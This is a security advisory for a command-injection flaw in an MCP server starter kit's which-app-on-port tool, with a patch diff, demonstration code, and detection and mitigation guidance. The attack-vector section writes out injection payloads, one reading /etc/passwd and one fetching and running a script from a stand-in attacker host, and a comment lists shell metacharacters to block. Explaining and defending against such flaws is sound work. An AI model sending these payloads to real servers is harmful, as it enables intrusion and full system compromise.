CVE-2025-54994 Overview
CVE-2025-54994 is a command injection vulnerability affecting @akoskm/create-mcp-server-stdio, an MCP (Model Context Protocol) server starter kit that uses the StdioServerTransport. Prior to version 0.0.13, the MCP Server implementation is vulnerable to command injection attacks through its tool definition and implementation. The vulnerability exists in the which-app-on-port tool, which relies on the Node.js child process API exec, an API that is unsafe when untrusted user input is concatenated into its command string.
Critical Impact
Remote attackers can execute arbitrary system commands on servers running vulnerable versions of @akoskm/create-mcp-server-stdio by exploiting the which-app-on-port tool's improper input handling, potentially leading to complete system compromise.
Affected Products
- @akoskm/create-mcp-server-stdio versions prior to 0.0.13
- Systems running MCP servers built with the vulnerable starter kit
- Applications utilizing the which-app-on-port tool functionality
Discovery Timeline
- September 8, 2025 - CVE-2025-54994 published to NVD
- September 9, 2025 - Last updated in NVD database
Technical Details for CVE-2025-54994
Vulnerability Analysis
This command injection vulnerability (CWE-78) stems from the unsafe use of the Node.js exec() function in the MCP server's which-app-on-port tool implementation. The exec() function spawns a shell and passes the command string directly to it, making it inherently dangerous when user-supplied input is concatenated into the command string without proper sanitization.
When a user provides a port number to the which-app-on-port tool, the input is directly concatenated into a shell command. An attacker can craft malicious input containing shell metacharacters (such as ;, |, &&, or backticks) to break out of the intended command context and execute arbitrary commands on the underlying system.
Root Cause
The root cause is the use of Node.js child_process.exec() API with unsanitized user input. The exec() function interprets the entire command string through a shell, allowing shell metacharacters to be processed. This design pattern creates a direct path for command injection when any portion of the command string originates from untrusted sources. The vulnerable code in src/index.ts (lines 24-40) concatenates user input directly into shell commands without validation or escaping.
Attack Vector
The attack vector is network-based, requiring no authentication or user interaction. An attacker can send crafted requests to the MCP server's which-app-on-port tool with malicious payloads embedded in the port parameter. For example, instead of providing a legitimate port number like 3000, an attacker could inject payloads such as 3000; cat /etc/passwd or 3000 && wget http://attacker.com/malware.sh | sh to execute arbitrary commands with the privileges of the Node.js process.
import { McpServer, ResourceTemplate } from "@modelcontextprotocol/sdk/server/mcp.js";
import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js";
import { z } from "zod";
-import { exec } from "child_process";
+import { execFile } from "child_process";
// Create an MCP server
const server = new McpServer({
name: "Demo",
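Review bot: the swap from `exec` to `execFile` in the import lines is only effective if the call site, which is not part of this hunk, passes the port as its own element of the args array and does not set `shell: true`; please confirm that in the same commit. Since `z` from zod is already imported in this file, the tool's port parameter could also be declared as an integer bounded to 1-65535, so non-numeric input is rejected before any process is created.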
Source: GitHub Commit Details
The patch replaces the vulnerable exec() function with execFile(), which does not spawn a shell and treats arguments as literal values, preventing command injection attacks.
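The difference the patch relies on, as an added example that is not code from the starter kit: a harmless `echo` stands in for the real port-lookup command, and the sample input is constructed. It assumes a POSIX host with `/bin/sh` and `echo` available.

```javascript
// Added illustration (constructed): contrasts shell-based and argv-based
// invocation, with `echo` standing in for the real port-lookup command.
const { execSync, execFileSync } = require("node:child_process");

// Shell path: the whole string is handed to /bin/sh, so `;` ends the first
// command and starts a second one.
function viaShell(port) {
  return execSync(`echo port=${port}`, { encoding: "utf8" })
    .trim()
    .split("\n");
}

// No-shell path: the value is a single argv element, so no metacharacter
// is interpreted and the text reaches the program unchanged.
function viaArgv(port) {
  return execFileSync("echo", [`port=${port}`], { encoding: "utf8" })
    .trim()
    .split("\n");
}

// Constructed input in the shape the advisory describes: a port, then `;`.
const SAMPLE = "3000; echo SECOND-COMMAND-RAN";

// Run both paths on the same input so the outputs can be compared.
function compare(port = SAMPLE) {
  return { shell: viaShell(port), argv: viaArgv(port) };
}

console.log(compare());
```

The shell path returns two output lines because two commands ran; the argv path returns one line containing the input verbatim.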
Detection Methods for CVE-2025-54994
Indicators of Compromise
- Unusual process spawning from Node.js MCP server processes
- Unexpected outbound network connections from MCP server instances
- System commands executed with unexpected arguments containing shell metacharacters
- Log entries showing malformed port values with shell operators (;, |, &&, $())
Detection Strategies
- Monitor Node.js process trees for child processes that deviate from expected behavior (commands other than port lookup utilities)
- Implement application-layer logging to capture all inputs to the which-app-on-port tool
- Deploy runtime application self-protection (RASP) solutions to detect command injection attempts
- Use network intrusion detection systems to identify suspicious payloads in MCP server traffic
Monitoring Recommendations
- Enable verbose logging on MCP server instances to capture tool invocations and parameters
- Set up alerts for any MCP server process spawning unexpected child processes
- Monitor for file system changes in directories where the MCP server operates
- Implement anomaly detection for network traffic patterns from MCP server hosts
How to Mitigate CVE-2025-54994
Immediate Actions Required
- Upgrade @akoskm/create-mcp-server-stdio to version 0.0.13 or later immediately
- Audit any custom code built on this starter kit for similar patterns using exec() with user input
- Implement input validation to ensure port parameters contain only numeric values
- Consider temporarily disabling the which-app-on-port tool if immediate patching is not possible
Patch Information
The vulnerability has been fixed in version 0.0.13 of @akoskm/create-mcp-server-stdio. The fix replaces the unsafe exec() function with execFile(), which does not interpret shell metacharacters. Organizations should update their dependencies using:
npm update @akoskm/create-mcp-server-stdio
For detailed patch information, refer to the GitHub Security Advisory and the commit implementing the fix.
Workarounds
- Implement strict input validation to reject any non-numeric characters in port parameters
- Use network segmentation to limit the exposure of MCP server instances
- Apply the principle of least privilege to the MCP server process user account
- Deploy web application firewalls (WAF) with command injection detection rules
# Configuration example - Validate port input before processing
# Add input validation in your MCP server configuration
# Ensure port parameter matches pattern: ^[0-9]{1,5}$
# Reject any input containing: ; | & $ ` ( ) { } [ ] < > \ ' "
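One way to implement the port validation described above together with a shell-free lookup (an added example, not the project's own code). The function names are hypothetical, and `lsof` with these arguments is an assumed port-lookup utility, since the advisory does not show the real command.

```javascript
// Added example (not the starter kit's code). `lsof` and its arguments are an
// assumed port-lookup utility; the advisory does not show the real command.
const { execFile } = require("node:child_process");

// Accept only a canonical decimal integer in the valid port range.
// The digit-only pattern alone would still admit 0 and 65536-99999.
function parsePort(value) {
  const text = typeof value === "number" ? String(value) : value;
  if (typeof text !== "string" || !/^[0-9]{1,5}$/.test(text)) {
    throw new TypeError("port must be 1-5 decimal digits");
  }
  const port = Number(text);
  if (port < 1 || port > 65535) {
    throw new RangeError("port must be between 1 and 65535");
  }
  return port;
}

// Build the argv separately so it can be inspected and tested without running it.
function lookupArgv(value) {
  const port = parsePort(value);
  return ["lsof", ["-nP", `-iTCP:${port}`, "-sTCP:LISTEN"]];
}

// Hypothetical handler body: validate first, then run without a shell.
function whichAppOnPort(value) {
  return new Promise((resolve, reject) => {
    let file, args;
    try {
      [file, args] = lookupArgv(value);
    } catch (err) {
      return reject(err); // refused before any process is created
    }
    execFile(file, args, { timeout: 5000 }, (err, stdout) => {
      // lsof exits 1 when nothing is listening; treat that as an empty result.
      if (err && err.code !== 1) return reject(err);
      resolve(stdout.trim());
    });
  });
}

// Returns true when validation refuses the input.
function isRejected(value) {
  try { parsePort(value); return false; } catch { return true; }
}
```

Validation is an allow-list on the expected shape, so the metacharacter deny-list is unnecessary: anything that is not 1-5 digits in range is refused.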


